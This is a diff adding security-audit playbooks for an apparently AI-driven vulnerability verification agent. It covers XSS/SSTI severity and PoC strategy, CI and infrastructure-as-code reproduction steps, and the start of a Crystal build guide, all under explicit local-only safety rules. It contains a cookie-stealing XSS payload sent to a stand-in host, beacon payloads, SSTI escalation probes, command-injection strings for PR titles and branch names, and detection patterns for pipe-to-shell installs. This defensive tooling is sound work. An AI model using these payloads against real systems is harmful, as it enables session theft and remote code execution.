+  `{{ }}` (escaped), Angular interpolation `{{ }}` (escaped + built-in
+  sanitizer), Jinja2/Twig/Nunjucks/Tera default autoescape, `html/template`
+  (Go), Blade `{{ }}`, Thymeleaf `th:text`, askama/maud (Rust) defaults,
+  ECR/Crystal only if `HTML.escape` is applied. Escaped text output is inert.
+- **Contextually-correct encoder applied:** `HTML.escape`/`ERB::Util.html_escape`,
+  `CGI.escapeHTML`, `htmlspecialchars($x, ENT_QUOTES, 'UTF-8')`, Go
+  `html/template` auto or `template.HTMLEscapeString`, Java `OWASP Encoder`
+  (`Encode.forHtml`/`forJavaScript`/`forUriComponent`), `DOMPurify.sanitize(x)`
+  before `innerHTML`, `textContent`/`innerText`/`createTextNode` (NOT
+  `innerHTML`), `setAttribute` for non-URL, non-`on*` attrs. The encoder must
+  match the context (HTML body vs attribute vs JS vs URL) — HTML-entity escaping
+  inside a JS/URL context is NOT effective.
+- **Vetted HTML sanitizer on a raw-HTML feature:** `DOMPurify.sanitize`,
+  Rails `sanitize`/`sanitize_helper` with a restrictive allowlist, Python
+  `bleach.clean` / `nh3`, `sanitize-html` (Node) with a safe config, OWASP
+  Java HTML Sanitizer, Go `bluemonday` `UGCPolicy`/`StrictPolicy`. Effective
+  only if the config strips scripts/event handlers/`javascript:` URIs and is
+  applied on the path to the sink (check the actual policy, not just its
+  presence).
+- **SSTI guard:** the user value is passed as a **template variable / context
+  data**, never as template source, and the template file/name is a fixed
+  literal or chosen from a closed allowlist (not built from input). Logic-less
+  engines (Mustache, or Handlebars without helpers) rendering a *fixed* template
+  with user *data* are not SSTI.
+- **Value is provably non-HTML by type/validation before the sink:** strict
+  allowlist (enum, numeric cast, UUID/regex `^[\w-]+$` that excludes
+  `<>"'&`/backtick), or a URL validated to `http(s)` scheme with a real parser
+  before being put in `href`. A type that cannot carry markup (integer, bool,
+  enum) reaching an HTML sink is safe.
+- **CSP is NOT a substitute:** a `Content-Security-Policy` may reduce impact but
+  does not make an otherwise-injectable sink "not a finding" — only downgrade
+  severity if the CSP is strict (nonce/hash-based, no `unsafe-inline`,
+  no overly-broad host allowlist) AND verifiably served on the affected
+  response. Note it in `sanitizers_checked`; do not let it zero out a clear
+  injection.
+- **No untrusted source on the path:** the rendered value is a hardcoded
+  constant, an i18n string from a trusted bundle, or operator-set config — not
+  user/stored input.
+
+If a guard exists but is bypassable — wrong context (HTML-escaped value in a JS
+or URL context), permissive sanitizer config (allows `<script>`/`on*`/
+`javascript:` URLs), regex that misses an encoding, escaping applied *after* a `raw`/
+`html_safe` marking that already trusted the string — it is NOT a mitigation:
+flag it and name the bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — **SSTI with code execution** on the server (Jinja2/Twig/
+  FreeMarker/ERB/Velocity reaching `{{7*7}}`→RCE), OR unauthenticated **stored
+  XSS** on a high-traffic/authenticated surface that runs in victims' sessions
+  (admin panel, shared dashboard) enabling account/session takeover at scale.
+  Attacker controls markup with no effective escaping and no blocking CSP.
+- **High** — stored XSS requiring some auth/condition but hitting other users'
+  sessions (cookie/session theft, CSRF-token exfil, action-on-behalf), or
+  reflected XSS on an authenticated/sensitive page with a realistic delivery
+  vector and no strict CSP. Client-side SSTI (e.g. AngularJS sandbox escape) on
+  a real surface.
+- **Medium** — reflected XSS needing unlikely user interaction or a same-origin
+  precondition, XSS materially constrained by a partial CSP, self-XSS that
+  crosses a trust boundary only with effort, or an injectable sink behind a
+  permissive-but-not-trivial sanitizer.
+- **Low/Info** — output in a context where breakout is blocked by an effective
+  strict CSP plus context-correct partial encoding (residual risk only), or a
+  raw-HTML helper fed solely operator-controlled content (defense-in-depth
+  note, not a body finding).
+
+Stored XSS outranks reflected at equal reach (no delivery step, persistent,
+fires for every viewer) — note persistence in `rationale`. SSTI defaults to
+critical/high because it usually escalates beyond XSS to RCE/secret disclosure.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "xss-ssti-001",
+  "title": "Stored XSS via raw bio render in profile view",
+  "vuln_class": "xss-ssti",
+  "owasp": "A05:2025",
+  "cwe": "CWE-79",
+  "asvs": "V1/V3",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/views/profiles/show.html.erb",
+  "line": 14,
+  "end_line": 14,
+  "code_excerpt": "<div class=\"bio\"><%= raw @user.bio %></div>",
+  "source": "@user.bio — stored DB column set by the user via PATCH /profile (params[:user][:bio]), no server-side HTML stripping on write",
+  "sink": "ERB raw() — emits @user.bio as unescaped HTML into the response body",
+  "data_flow": "params[:user][:bio] -> User#bio (persisted, no sanitize on update) -> show.html.erb `raw @user.bio` -> HTML body; Rails auto-escaping explicitly defeated by raw()",
+  "sanitizers_checked": "raw() bypasses ERB auto-escape; no sanitize()/DOMPurify on write or read path; no allowlist on bio; no CSP header on this response (checked layouts/application.html.erb); rendered in HTML body context where <script>/<img onerror> execute",
+  "rationale": "Any authenticated user stores markup that executes in every viewer's session when the profile is opened — session/cookie theft, CSRF-token exfil. Same raw() pattern at profiles/show.html.erb:31 (signature field).",
+  "exploit_sketch": "PATCH /profile bio=<img src=x onerror=fetch('//atk/c?'+document.cookie)>; victim views /profiles/<id> -> payload fires in their session.",
+  "dynamic_poc_plan": "Save the payload via the profile form, open the profile as a second logged-in user, observe the OOB callback receiving that user's cookie/marker; confirms cross-user execution.",
+  "proposed_fix": "Render @user.bio through an escaped/sanitized path instead of treating it as trusted HTML, so stored user input can no longer execute as markup in viewers' sessions; the exact mechanism (default escaping vs. allowlist sanitizer for rich text) is for the implementer to choose."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces the variable source→sink, states the
+**output context** (HTML body / attribute / JS string / URL / template source),
+and names any encoder/sanitizer encountered and why it fails or is absent.
+`sanitizers_checked` is the §4 FP guard made explicit — list each relevant
+control (auto-escape state, encoder context-match, sanitizer policy, SSTI
+data-vs-source check, CSP) and state it is absent or name the exact bypass. A
+finding without an untrusted source reaching an interpreted sink is not a
+finding. Use `status:"likely"` for a proven static trace, `"confirmed"` only
+after dynamic repro, `"triage"` if reachability/source/context is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove attacker bytes are *interpreted* (script executes / template
+evaluates), not merely echoed as text. Pick the oracle by sub-class:
+
+1. **Reflected/DOM XSS — execution oracle:** send the payload via the affected
+   param/hash/header and confirm script *runs*, not just appears. Inert proof:
+   the response contains the raw, unescaped `<script>`/`onerror=` (grep the body
+   for the payload with angle brackets intact, not entity-encoded). Live proof:
+   drive a headless browser (Playwright/puppeteer) to the URL with a unique
+   beacon (`<img src=x onerror="fetch('http://<listener>/xss-<nonce>')">` or
+   `<script>navigator.sendBeacon('http://<listener>/<nonce>')</script>`) and
+   observe the listener receive the nonce — that proves DOM/script execution.
+   Try multiple contexts if entity-escaped: attribute breakout
+   (`" onmouseover=...`), JS-string breakout (`</script><script>...`),
+   `javascript:`/`data:` URI in `href`/`src`.
+2. **Stored XSS — cross-user execution oracle:** persist the beacon payload via
+   the write endpoint (as user A), then load the rendering page as a *second*
+   session/user (B) in a headless browser; confirm the listener receives the
+   beacon carrying B's context (e.g. B's cookie/marker). This proves persistence
+   + cross-user firing, the high-severity property.
+3. **SSTI — evaluation oracle:** send an engine-appropriate probe that an escaper
+   could not produce: arithmetic `{{7*7}}` / `${7*7}` / `#{7*7}` / `<%= 7*7 %>`
+   and confirm the response contains `49` (proves the template engine evaluated
+   input). Escalate cautiously to confirm reach: Jinja2 `{{config}}` or
+   `{{request.application.__globals__}}`, Twig `{{_self}}`,
+   FreeMarker `<#assign x="freemarker.template.utility.Execute"?new()>` — for the
+   PoC, demonstrate a benign capability (read a known config value or echo a
+   process marker) rather than running destructive commands. `49` in the
+   response from a `7*7` input is sufficient to set `reproduced:true`.
+
+For each, record the exact request/payload, the affected context, and the
+observed evidence in the `Repro` object (`reproduced`, `method:"live-exploit"`
+for browser-confirmed execution or SSTI eval, `"static-poc"` if only the raw
+unescaped reflection is shown without a browser, `poc`, `observed`, `impact`).
+If a CSP is present, note in `notes` whether it actually blocked execution in the
+headless run (a payload that reflects but is CSP-blocked is a weaker finding —
+reflect that in severity).
diff --git a/plugins/security/prompts/playbooks/ci-iac.md b/plugins/security/prompts/playbooks/ci-iac.md
new file mode 100644
index 0000000..c21d3ca
--- /dev/null
+++ b/plugins/security/prompts/playbooks/ci-iac.md
@@ -0,0 +1,400 @@
+# ENV Playbook — CI & Infrastructure-as-Code
+
+Reproduce a candidate finding in a CI / Infrastructure-as-Code target: GitHub
+Actions / Forgejo-Gitea / GitLab CI workflows, Terraform (`*.tf`), Kubernetes
+manifests, Helm charts, and Dockerfiles. **This stack is almost never run
+live** — there is no long-lived server to exploit with an HTTP request. The
+repro is overwhelmingly **static**: a line-referenced trace from an untrusted
+source (a fork PR title, an issue/comment body, a branch name) to a dangerous
+sink (a `run:` shell step, a privileged token, attacker-controlled checkout),
+backed by **actionlint / tfsec-trivy / hadolint / checkov** output and, where it
+adds fidelity, a **local containerized re-enactment** of the injected command.
+Keep ALL traffic and side effects inside a local container — no external hosts,
+no real credentials, no data exfiltration, and **never push to or call a real
+forge / cloud / registry**.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `CN=va-$FID` — container name. `IMG=va-$FID:repro` — image tag (only when a
+  Dockerfile is the finding's subject).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`. For this stack the
+  realistic outcomes are **`static-poc`** (the default — proven injection trace
+  + linter confirmation) and **`unit-test`** (re-enact the injected command in a
+  local container and observe its effect). `live-exploit` and `build-only` are
+  rare here and called out where they apply.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+# CI/CD workflow definitions (GitHub, Forgejo/Gitea, GitLab, others):
+ls -d .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null
+find . -maxdepth 3 \( -path '*/.github/workflows/*.y*ml' \
+  -o -path '*/.forgejo/workflows/*.y*ml' -o -path '*/.gitea/workflows/*.y*ml' \
+  -o -name 'action.y*ml' -o -name '.gitlab-ci.yml' -o -name 'Jenkinsfile' \
+  -o -path '*/.circleci/config.yml' -o -name 'azure-pipelines.yml' \) 2>/dev/null
+
+# Infrastructure-as-Code:
+find . -maxdepth 4 \( -name '*.tf' -o -name '*.tfvars' -o -name '*.hcl' \) 2>/dev/null | head
+ls Chart.yaml values.yaml kustomization.yaml 2>/dev/null
+find . -maxdepth 3 -name '*.y*ml' -exec grep -lE '^(apiVersion|kind):' {} \; 2>/dev/null | head  # k8s manifests
+find . -maxdepth 3 \( -name 'Dockerfile' -o -name 'Dockerfile.*' -o -name 'Containerfile' \) 2>/dev/null
+```
+
+Signals and what each means:
+
+- **`.github/workflows/*.yml|*.yaml`** → GitHub Actions. **`.forgejo/workflows/`
+  / `.gitea/workflows/`** → Forgejo/Gitea Actions: the *same* `${{ }}` expression
+  model, `uses:` action references, and trigger semantics as GHA. **`action.yml`**
+  at a repo root or under `actions/` → a composite/JS/Docker action (its own
+  injection surface). **`.gitlab-ci.yml` / `Jenkinsfile` / `.circleci/config.yml`
+  / `azure-pipelines.yml`** → other CI engines (different syntax, same root
+  cause: untrusted input concatenated into a shell).
+- **`*.tf` / `*.tfvars` / `*.hcl`** → Terraform / HCL. Look for provider blocks,
+  `local-exec`/`remote-exec` provisioners, and `templatefile`/`external` data
+  sources (command and template sinks).
+- **`apiVersion:`+`kind:` YAML, `Chart.yaml`, `kustomization.yaml`** → Kubernetes
+  manifests / Helm / Kustomize (RBAC, `securityContext`, `hostPath`, privileged
+  pods, secrets in plain manifests).
+- **`Dockerfile` / `Containerfile`** → image build (base-image pinning, `RUN
+  curl | sh`, secrets in layers, `USER root`).
+
+**The trust boundary is ground truth.** For CI-injection the only thing that
+matters is *which trigger runs the workflow and what data the attacker controls
+under that trigger*. Map it before anything else:
+
+```sh
+# Triggers that run with repo secrets/write token on attacker-influenced input:
+grep -rnE 'pull_request_target|workflow_run|issue_comment|pull_request_review' \
+  .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null
+
+# Untrusted event fields interpolated directly (the classic GHA script-injection):
+grep -rnE '\$\{\{[^}]*github\.event\.(pull_request\.(title|body|head\.(ref|label))|issue\.(title|body)|comment\.body|review\.body|head_commit\.message)' \
+  .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null
+
+# run: steps that contain a ${{ }} expression (expansion happens BEFORE the shell runs):
+grep -rnE -A20 '^\s*(-\s*)?run:' .github/workflows .forgejo/workflows .gitea/workflows \
+  2>/dev/null | grep -F '${{'   # over-inclusive: confirm each hit is inside the run: body
+
+# Token scope + attacker-controlled checkout (the dangerous combination):
+grep -rnE 'permissions:|write-all|contents: write|id-token: write|pull-requests: write|secrets\.' \
+  .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null
+grep -rnE 'actions/checkout.*|ref:\s*\$\{\{.*head' .github/workflows 2>/dev/null
+```
+
+If none of the workflow signals hold and the target is pure Terraform/k8s/Docker,
+the finding is a **misconfiguration**, not an injection — drive it through the
+linters (Section 3b/3c) and a static trace; there is nothing to "fire".
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is never
+touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare for this stack), `cp -a <target>
+/tmp/va-$FID` instead and note it. All linting/build/re-enactment steps below run
+from `WT=/tmp/va-$FID`.
+
+**Do not** run the workflow against the real forge, and **never** `git push`,
+`gh`/`fj` API calls, `terraform apply`, `kubectl apply`, or `docker push` from
+the worktree. The worktree is for reading and for feeding files into local
+linters and a local container — nothing that mutates remote state.
+
+---
+
+## 3. Build & run (docker-first)
+
+There is usually nothing to "run" — the deliverables are **linter evidence** and,
+for the highest-fidelity injection proof, a **local re-enactment** of the exact
+command the attacker's input would produce. All tools run as throwaway
+containers (host toolchain may be absent); pin a recent tag.
+
+### 3a. CI workflow linting — actionlint (GitHub/Forgejo/Gitea Actions)
+
+`actionlint` flags shell-injection-prone `${{ }}` interpolations in `run:` steps,
+plus syntax/expression errors. It is the primary automated confirmation for a
+CI-injection finding.
+
+```sh
+docker run --rm -v "$WT":/repo -w /repo rhysd/actionlint:latest \
+  -color -shellcheck= .github/workflows/*.y*ml 2>&1 | tee /tmp/va-$FID.actionlint
+# Forgejo/Gitea live under a different dir — point actionlint at them too:
+docker run --rm -v "$WT":/repo -w /repo rhysd/actionlint:latest \
+  -color .forgejo/workflows/*.y*ml .gitea/workflows/*.y*ml 2>&1 | tee -a /tmp/va-$FID.actionlint
+```
+
+The diagnostic to capture looks like:
+`property "..." is potentially untrusted ... avoid using it directly in inline
+scripts` — that line, with the file/line it points at, is the evidence that the
+sink is real.
+
+### 3b. Terraform / HCL — tfsec (via trivy) and validate
+
+```sh
+# Security scan (tfsec is now distributed inside trivy; both forms shown):
+docker run --rm -v "$WT":/src aquasec/trivy:latest config --severity HIGH,CRITICAL /src \
+  2>&1 | tee /tmp/va-$FID.tfsec
+# Legacy standalone tfsec image, if trivy is unavailable:
+docker run --rm -v "$WT":/src aquasec/tfsec:latest /src 2>&1 | tee -a /tmp/va-$FID.tfsec
+
+# Syntax/structure only (no provider creds, no apply, no remote state):
+docker run --rm -v "$WT":/src -w /src --entrypoint sh hashicorp/terraform:latest \
+  -c 'terraform init -backend=false -input=false && terraform validate' \
+  2>&1 | tee /tmp/va-$FID.tfvalidate
+```
+
+`-backend=false` skips remote state and `validate` needs no credentials (`init` still
+downloads providers/modules) — never `plan`/`apply` against a real backend or provider.
+
+### 3c. Dockerfile — hadolint; Kubernetes/Helm — checkov
+
+```sh
+docker run --rm -i hadolint/hadolint:latest < "$WT/Dockerfile" \
+  2>&1 | tee /tmp/va-$FID.hadolint
+
+# Broad IaC scanner covering k8s/Helm/Dockerfile/Terraform — good cross-check:
+docker run --rm -v "$WT":/src bridgecrew/checkov:latest -d /src --compact \
+  2>&1 | tee /tmp/va-$FID.checkov
+```
+
+### 3d. Local re-enactment of an injected command (highest-fidelity injection proof)
+
+When the finding is a `run:`-step script injection, the most convincing proof is
+to show that the attacker's input, once GHA substitutes it into the shell, runs
+an arbitrary command. Reconstruct the *exact* shell the runner would execute and
+run it in a disposable container — never on the host, never against the forge.
+
+Take the vulnerable step, e.g.:
+
+```yaml
+# .github/workflows/pr.yml  (trigger: pull_request_target)
+- run: echo "Title: ${{ github.event.pull_request.title }}"
+```
+
+The runner expands `${{ ... }}` *before* invoking bash, so a PR titled
+`a"; touch /tmp/va-pwned; echo "` yields the literal script below. Run that
+literal script in a clean container and observe the side effect:
+
+```sh
+INJECT='a"; touch /tmp/va-pwned-'$FID'; echo "'    # stands in for the PR title
+docker run --rm --name $CN -e TITLE_PoC="$INJECT" ubuntu:24.04 \
+  bash -c 'echo "Title: '"$INJECT"'"; ls -l /tmp/va-pwned-'"$FID"' 2>&1'
+```
+
+The reconstructed command must be derived faithfully from the workflow text
+(same quoting/shell the step uses); record both the rendered script and the
+observed side effect (the sentinel file, an `id`/`whoami`, an echoed marker).
+Side effects are benign sentinels only — never destructive, never networked.
+
+---
+
+## 4. Dependencies
+
+For this stack "dependencies" are the **actions, modules, images, and charts the
+build pulls in** — pinning and provenance, not a package install.
+
+- **Action / reusable-workflow refs** — list every `uses:` and whether it is
+  pinned to a 40-hex commit SHA (safe) or a mutable tag/branch
+  (`@v4`, `@main` — mutable, hijackable):
+
+  ```sh
+  grep -rnE 'uses:\s*\S+@' .github/workflows .forgejo/workflows .gitea/workflows 2>/dev/null \
+    | grep -vE '@[0-9a-f]{40}\b'      # what's left is unpinned → supply-chain surface
+  ```
+
+- **Terraform modules/providers** — registry `source` + `version` constraints,
+  git modules on a floating `?ref=` branch, and `.terraform.lock.hcl` (provider
+  hash pinning). Restore offline only, no network mutation:
+
+  ```sh
+  docker run --rm -v "$WT":/src -w /src hashicorp/terraform:latest \
+    init -backend=false -input=false 2>&1 | tee /tmp/va-$FID.tfinit
+  ```
+
+- **Docker base images** — mutable tag (`:latest`, `:3`) vs digest pin
+  (`@sha256:...`); `grep -nE '^FROM ' "$WT/Dockerfile"`.
+- **Helm chart deps** — `Chart.yaml` `dependencies:` + `Chart.lock`.
+
+Do **not** upgrade/bump anything — that changes the audited input set. Honor the
+target's pins exactly; the *absence* of a pin is itself often the finding.
+
+---
+
+## 5. Run & health-check
+
+**Usually N/A** — there is no service to start and no port to probe. Skip
+straight to Fire the PoC (static trace + linter evidence). The "health check"
+for this stack is that the linters parsed the files and produced diagnostics:
+
+```sh
+grep -nEi 'untrusted|injection|error|warning|CRITICAL|HIGH' \
+  /tmp/va-$FID.actionlint /tmp/va-$FID.tfsec /tmp/va-$FID.hadolint \
+  /tmp/va-$FID.checkov 2>/dev/null
+```
+
+Rare live cases (and their ports) — only if the finding's impact genuinely
+requires a running artifact:
+
+- A Dockerfile whose *built image* contains the vulnerability (e.g. a baked-in
+  service with a flaw) — build and run it like any container target; common
+  ports follow the embedded app (8080/3000/80). Confirm up with
+  `curl -fsS http://127.0.0.1:$PORT/`.
+- A self-hosted CI runner image — out of scope to stand up a real runner; prefer
+  the Section 3d re-enactment instead.
+
+If you do build/run an image, bind host ports to `127.0.0.1` only.
+
+---
+
+## 6. Seed
+
+Minimal, synthetic, local-only. For this stack "seed" means *crafting the
+untrusted input the trigger would carry* — not creating users.
+
+- **CI script injection:** the seed is the malicious event payload string (PR
+  title/body, branch name, issue comment). Keep it as a benign sentinel-producing
+  payload, e.g. `x"; id > /tmp/va-$FID.out; echo "` or a branch named
+  `$(touch /tmp/va-$FID.b)`. You craft it as data and feed it to the local
+  re-enactment (Section 3d) — you do **not** open a real PR on a real forge.
+- **Workflow that needs files at specific paths:** create the minimal files the
+  step reads (e.g. an empty `dist/` or a one-line `version.txt`) inside `$WT` so
+  the reconstructed step doesn't fail for an unrelated reason.
+- **Terraform/k8s with required variables:** supply throwaway `*.tfvars` /
+  manifest values that satisfy `validate`/lint — never real account IDs, ARNs,
+  cluster endpoints, or tokens.
+
+Never reuse real secrets from the repo or environment.
+
+---
+
+## 7. Fire the PoC safely
+
+The "PoC" for CI-IaC is a **demonstrated source→sink**, not an HTTP request.
+Produce the strongest of these that the finding supports, keeping everything
+local:
+
+```sh
+# (A) PRIMARY — static injection proof: linter confirmation + the rendered shell.
+#     actionlint pins the untrusted property; show the line and the expansion.
+grep -nEi 'untrusted|injection' /tmp/va-$FID.actionlint
+# Then quote the workflow step and the rendered command (what bash actually runs)
+# for an attacker-chosen value of the event field — this is the static-poc body.
+
+# (B) HIGHER FIDELITY — re-enact the injected command in a throwaway container
+#     and capture the side effect (see Section 3d). Proves arbitrary execution:
+INJECT='x"; id > /tmp/va-'"$FID"'.out 2>&1; echo "'
+docker run --rm --network none --name $CN ubuntu:24.04 \
+  bash -c 'echo "Title: '"$INJECT"'"; cat /tmp/va-'"$FID"'.out 2>&1'
+# Evidence = the `uid=0(root)` (or runner user) line: the title field executed code.
+
+# (C) TOKEN/ checkout abuse: show the dangerous trigger + write token + attacker
+#     checkout together. Evidence is the three grep'd lines that co-occur:
+grep -nE 'pull_request_target|workflow_run' .github/workflows/*.y*ml
+grep -nE 'contents: write|id-token: write|secrets\.|GITHUB_TOKEN' .github/workflows/*.y*ml
+grep -nE 'ref:\s*\$\{\{.*head|head\.sha|head\.ref' .github/workflows/*.y*ml
+# Explain the chain: untrusted code is checked out AND a privileged step runs it.
+
+# (D) Terraform command sink: local-exec / external with interpolated input.
+grep -rnE 'local-exec|remote-exec|"external"|templatefile\(' "$WT" --include='*.tf'
+# Evidence = tfsec/trivy finding ID + the line where attacker-influenceable input
+# reaches the provisioner command string.
+
+# (E) Dockerfile sink: pipe-to-shell install / unpinned base / baked secret.
+grep -nE 'curl .*\| *(sh|bash)|wget .*\| *(sh|bash)|^FROM .*:latest|ARG .*(TOKEN|SECRET|KEY)' \
+  "$WT/Dockerfile"
+# Evidence = hadolint rule (e.g. DL3007/DL4006/SC2086) + the offending line.
+```
+
+Evidence to record for the repro result:
+
+- The exact untrusted **source** (event field / module ref / base image) and the
+  **sink** (the `run:` shell, provisioner, RBAC grant), each with `file:line`
+  → `poc` + `data_flow`.
+- The proof artifact: the actionlint/tfsec/hadolint diagnostic line, and — when
+  you did the re-enactment — the captured command output / sentinel file
+  → `observed`.
+- What an attacker gains (CI RCE with the write-scoped `GITHUB_TOKEN` /
+  `secrets.*`, exfiltratable OIDC token, cluster privilege, etc.) → `impact`.
+
+Set the method honestly:
+
+- Re-enacted the injected command and observed execution → `method: unit-test`,
+  `reproduced: true`.
+- Linter + line-referenced source→sink trace, no live execution → `method:
+  static-poc`, `reproduced: false` (the expected default for this stack).
+
+Safety invariants: no real PR/issue/comment on any forge; no `push` / `apply` /
+`kubectl` / `docker push`; all command re-enactment stays inside a disposable
+local container with benign sentinels; no outbound connections to real hosts; no
+real secrets or cloud/forge credentials.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN 2>/dev/null
+docker image rm -f $IMG 2>/dev/null              # only if 3b/5 built one
+rm -f /tmp/va-$FID.actionlint /tmp/va-$FID.tfsec /tmp/va-$FID.tfvalidate \
+      /tmp/va-$FID.tfinit /tmp/va-$FID.hadolint /tmp/va-$FID.checkov \
+      /tmp/va-$FID.out /tmp/va-$FID-pwned* /tmp/va-$FID.b
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+For CI-IaC the *expected* outcome is already a static/test proof, so "fallback"
+mostly means choosing the right rung. Set `method` accordingly (enum:
+`live-exploit | unit-test | build-only | static-poc`).
+
+1. **Re-enactment ran (preferred for injection):** the reconstructed shell ran
+   in a local container and the side effect was observed (sentinel file, `id`
+   output, echoed marker). Set `method: unit-test`, `reproduced: true`. This is
+   the highest fidelity realistically available here.
+
+2. **Linter confirms + trace is airtight (the default):** actionlint flags the
+   untrusted property / tfsec or hadolint flags the sink, and you have a complete
+   `file:line` source→sink path with no effective guard (no
+   `if:`-gating to trusted actors, no expression moved to an `env:` + quoted
+   `"$VAR"` indirection, no minimal `permissions:`). Set `method: static-poc`,
+   `reproduced: false`. Cite the diagnostic line as evidence.
+
+3. **Linters unavailable / image can't be pulled (offline):** fall back to a
+   pure static PoC — quote the workflow/Terraform/Dockerfile lines, show the
+   attacker-controlled value, and render the exact command/config the sink
+   produces, explaining the guard analysis by hand. Set `method: static-poc`,
+   `reproduced: false`.
+
+4. **Dockerfile-built artifact whose runtime is the real subject:** if the
+   vulnerability only manifests in the *running* image, build it (Section 5) and,
+   if it serves, fire a real local request → `method: live-exploit`; if it builds
+   but can't start, record the build success + reachable trace → `method:
+   build-only`.
+
+Never claim `reproduced: true` without observed runtime/command evidence; a
+linter diagnostic or a hand trace alone, however airtight, is `static-poc`
+with `reproduced: false`. Prefer the highest-fidelity rung that actually
+works, and remember the guard check (trusted-actor `if:`, quoted-`env:`
+indirection, scoped `permissions:`) is what separates a real finding from noise.
diff --git a/plugins/security/prompts/playbooks/crystal.md b/plugins/security/prompts/playbooks/crystal.md
new file mode 100644
index 0000000..a81a206
--- /dev/null
+++ b/plugins/security/prompts/playbooks/crystal.md
@@ -0,0 +1,257 @@
+<!--
+ENV PLAYBOOK — crystal. You are the dynamic-verification (phase 6) agent. A
+candidate finding survived deep review + adversarial verify; your job is to
+BUILD, RUN, and EXPLOIT the target to reproduce it with a real PoC, then fill a
+Repro object (AGENTS.md). Docker-first: the native Crystal toolchain may be
+absent on the host, so prefer containerized build/run. Keep ALL traffic inside
+the local container/network — no external hosts, no real creds, no exfiltration.
+Emit Repro.method honestly: live-exploit > unit-test > build-only > static-poc.
+Be concrete; copy the commands. Replace {{ref}}, ports, and paths as detected.
+-->
+
+# Env Playbook — Crystal (`crystal`)
+
+**Stack key:** `crystal` · **Manifests:** `shard.yml` (+ `shard.lock`) ·
+**Sources:** `*.cr` · **Common web frameworks:** Kemal, Lucky, Amber, Grip,
+Athena · **Repro target:** a `Repro` object (`method`, `setup_commands`, `poc`,
+`observed`, `impact`).
+
+## 1. Detect — confirm the stack
+
+A repo is Crystal if recon found any of:
+
+```sh
+ls shard.yml shard.lock 2>/dev/null          # the manifest + lockfile
+find . -name '*.cr' -not -path './lib/*' | head   # first-party sources (skip vendored lib/)
+```
+
+Read `shard.yml` to pick the run strategy:
+
+- `targets:` → which binaries `crystal build` produces (`name` + `main` path).
+- `dependencies:` → web framework in play. Grep the keys: `kemal`, `lucky`,
+  `amber`, `grip`, `athena` decide the default port and start command below.
+- `crystal:` → required compiler version constraint; pin the base image to it.
+- A `Dockerfile` / `docker-compose.yml` / `compose.yaml` at the root → prefer it
+  (section 3). Vendored deps live in `lib/`; the cache key is `shard.lock`.
+
+If none of these are present this playbook does not apply — stop and report the
+mismatch rather than guessing.
+
+## 2. Isolate — work in a throwaway worktree at the target ref
+
+The verifier already runs under worktree isolation (`agent(..., {isolation:
+'worktree'})`); the original tree is untouched. Do NOT build in the source tree.
+
+If you must materialize a worktree yourself, branch from the target ref using a
+LOCAL ref (never `origin/<branch>`, which silently sets upstream):
+
+```sh
+git -C /path/to/target worktree add --detach /tmp/vuln-crystal {{ref}}
+cd /tmp/vuln-crystal
+git rev-parse --short HEAD            # record in Repro.environment
+```
+
+Everything below runs inside this worktree. All build artifacts (`lib/`, `bin/`,
+the compiled binary) stay here and are discarded at teardown.
+
+## 3. Build & run — docker-first
+
+Crystal compiles to a static-ish native binary; you need the compiler image even
+if the host has no toolchain. Use the official `crystallang/crystal` image,
+pinned to the version from `shard.yml`'s `crystal:` key (fall back to `latest`).
+
+### 3a. If a Dockerfile / compose file exists — use it
+
+```sh
+# Compose, only if the plugin is present (opportunistic, not required):
+docker compose version >/dev/null 2>&1 && docker compose up --build -d
+
+# Otherwise the reliable path — plain docker build/run from the repo Dockerfile:
+docker build -t vuln-crystal:poc .
+docker run --rm -d --name vuln-crystal \
+  -p 127.0.0.1:3000:3000 vuln-crystal:poc
+```
+
+Bind to `127.0.0.1` only — never `0.0.0.0` on a shared host. Map the port the
+app actually listens on (section 5).
+
+### 3b. No Dockerfile — minimal generic image
+
+Build inside the official image and run the binary in the same container. One
+disposable container, source mounted read-write so `shards`/`crystal` can write
+`lib/` and `bin/`:
+
+```sh
+docker run --rm -d --name vuln-crystal \
+  -v "$PWD":/app -w /app \
+  -p 127.0.0.1:3000:3000 \
+  crystallang/crystal:latest \
+  sh -c 'shards install && crystal run src/<main>.cr'
+```
+
+Replace `src/<main>.cr` with the `targets.<name>.main` from `shard.yml` (Kemal
+apps are often `src/<app>.cr`; Lucky uses `crystal run src/start_server.cr`,
+Amber `crystal run src/<app>.cr`). For a faster, repeatable run, build once then
+exec:
+
+```sh
+docker run --rm -d --name vuln-crystal -v "$PWD":/app -w /app \
+  -p 127.0.0.1:3000:3000 crystallang/crystal:latest \
+  sh -c 'shards install && crystal build --release -o bin/app src/<main>.cr && exec bin/app'
+```
+
+Lucky/Amber may need Postgres. Stand up a private one and link it on a
+throwaway network — keep it container-local:
+
+```sh
+docker network create vulnnet 2>/dev/null || true
+docker run --rm -d --name vuln-db --network vulnnet \
+  -e POSTGRES_PASSWORD=poc -e POSTGRES_DB=app_development postgres:16-alpine
